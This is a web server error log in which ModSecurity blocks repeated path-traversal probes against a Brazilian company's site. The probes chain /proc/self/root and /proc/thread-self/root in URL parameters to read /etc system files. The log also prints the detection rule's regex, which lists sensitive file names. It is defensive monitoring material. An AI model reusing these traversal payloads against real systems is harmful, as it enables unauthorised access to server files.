[Tue Mar 17 14:39:47.845231 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:36268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmR4_PqhzTj3BvfDX-KiQAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:39:58.093819 2026] [proxy_fcgi:error] [pid 9299:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48560] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:40:01.245891 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.241.31:50858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmR8Rj0p0SRWAqcjGF8SAAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:40:09.544422 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.243.128:60746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmR-a4xEDsg_V3ESNZPFgAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:40:14.067780 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.31:60168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmR_geiSKl8TjouI-YcNAAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:40:18.962211 2026] [:error] [pid 9299:tid 140411574073088] [client 74.7.243.128:59048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmSAr-sgTmmJoPuMdy5BgAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:40:20.123799 2026] [proxy_fcgi:error] [pid 17965:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48912] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:40:42.130987 2026] [proxy_fcgi:error] [pid 7437:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49300] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:41:04.161767 2026] [proxy_fcgi:error] [pid 19507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49764] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:41:20.301477 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.243.128:41028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmSQK4xEDsg_V3ESNZPTQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:41:26.130630 2026] [proxy_fcgi:error] [pid 7437:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50212] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:41:47.126131 2026] [proxy_fcgi:error] [pid 2473:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50556] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:41:54.287631 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:43582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmSYtY0UrI5A3LftIz_FgAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:42:08.104294 2026] [proxy_fcgi:error] [pid 2598:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50926] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:42:29.065822 2026] [proxy_fcgi:error] [pid 29151:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51250] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:42:32.911494 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.243.128:42750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmSiPPqhzTj3BvfDX-K1gAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:42:41.537509 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.243.128:51138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmSka4xEDsg_V3ESNZPagAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:42:50.130149 2026] [proxy_fcgi:error] [pid 19507:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51632] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:43:06.811829 2026] [:error] [pid 9299:tid 140411666392832] [client 74.7.243.128:34266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmSqr-sgTmmJoPuMdy5XQAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:43:07.199669 2026] [:error] [pid 17965:tid 140411674785536] [client 74.7.241.31:58546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmSq6t8Nd0UC_OcbVHN5AAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:43:11.538553 2026] [:error] [pid 18380:tid 140411733534464] [client 74.7.243.128:45900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmSrq4xEDsg_V3ESNZPdQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:43:12.137788 2026] [proxy_fcgi:error] [pid 6296:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52008] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:43:13.154360 2026] [:error] [pid 17965:tid 140411699963648] [client 74.7.241.31:39690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmSsat8Nd0UC_OcbVHN6wAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:43:15.031910 2026] [:error] [pid 29151:tid 140411699963648] [client 74.7.241.31:39706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmSs_PqhzTj3BvfDX-K5gAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:43:33.041879 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52312] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:43:54.137826 2026] [proxy_fcgi:error] [pid 17965:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52670] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:43:59.682772 2026] [:error] [pid 18380:tid 140411741927168] [client 74.7.243.128:60116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmS364xEDsg_V3ESNZPlgAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:44:15.573938 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53146] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:44:37.089938 2026] [proxy_fcgi:error] [pid 2598:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53706] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:44:42.375148 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.243.128:45664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTCgeiSKl8TjouI-YclQAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:44:58.119469 2026] [proxy_fcgi:error] [pid 7004:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54262] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:45:19.153789 2026] [proxy_fcgi:error] [pid 9299:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54642] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:45:41.093913 2026] [proxy_fcgi:error] [pid 7004:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55044] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:46:04.129791 2026] [proxy_fcgi:error] [pid 9299:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55720] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:46:05.190928 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.128:45664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTXQeiSKl8TjouI-YcvAAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:46:06.331150 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.31:39710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTXqBJNF7axNlVR0UbegAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:46:11.507241 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.241.31:47068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTYxj0p0SRWAqcjGF85gAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
